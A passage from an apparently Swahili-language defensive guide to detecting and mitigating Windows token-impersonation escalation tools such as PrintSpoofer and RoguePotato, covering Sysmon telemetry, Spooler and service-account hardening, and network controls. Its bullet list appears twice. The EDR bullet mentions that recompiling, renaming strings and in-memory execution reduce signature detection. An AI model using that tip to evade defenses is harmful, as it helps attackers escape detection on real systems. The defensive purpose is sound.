- Fuatilia michakato inayounda named pipes na mara moja kuita token-duplication APIs ikifuatiwa na CreateProcessAsUser/CreateProcessWithTokenW. Sysmon inaweza kuonyesha telemetry muhimu: Event ID 1 (process creation), 17/18 (named pipe created/connected), na command lines zinazozalisha child processes kama SYSTEM.
- Kuimarisha Spooler: Kuzima huduma ya Print Spooler kwenye servers ambapo haifai kunahitajika kunazuia coerctions za ndani za aina ya PrintSpoofer kupitia spoolss.
- Kuimarisha akaunti za huduma: Punguza utoaji wa SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege kwa custom services. Fikiria kuendesha services chini ya virtual accounts zenye least privileges zinazohitajika na kuzitenga kwa kutumia service SID na write-restricted tokens inapowezekana.
- Udhibiti wa mtandao: Kuzuia outbound TCP/135 au kupunguza trafiki ya RPC endpoint mapper kunaweza kuvunja RoguePotato isipokuwa internal redirector inapatikane.
- EDR/AV: Zana hizi zote zina saini zinazotambulika kwa wingi. Recompiling kutoka source, kubadilisha symbols/strings, au kutumia in-memory execution kunaweza kupunguza utambuzi lakini haitavunja behavioral detections thabiti.
- Angalia processes zinazounda named pipes na mara moja kuita token-duplication APIs ikifuatiwa na CreateProcessAsUser/CreateProcessWithTokenW. Sysmon inaweza kuonyesha telemetry muhimu: Event ID 1 (process creation), 17/18 (named pipe created/connected), na command lines zinazozalisha child processes kama SYSTEM.
- Spooler hardening: Kuizima Print Spooler service kwenye servers ambapo haitegemeiuzu huzuia PrintSpoofer-style local coercions kupitia spoolss.
- Service account hardening: Punguza utoaji wa SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege kwa custom services. Fikiria kuendesha services chini ya virtual accounts zenye least privileges zinazohitajika na kuziwekea isolations kwa service SID na write-restricted tokens inapowezekana.
- Network controls: Ku/block outbound TCP/135 au kuzuia RPC endpoint mapper traffic kunaweza kuvunja RoguePotato isipokuwa internal redirector ipo.
- EDR/AV: Zana hizi zote zina signatures nyingi. Recompiling from source, kubadili majina ya symbols/strings, au kutumia in-memory execution kunaweza kupunguza detection lakini haitashinda behavioral detections imara.
## Marejeo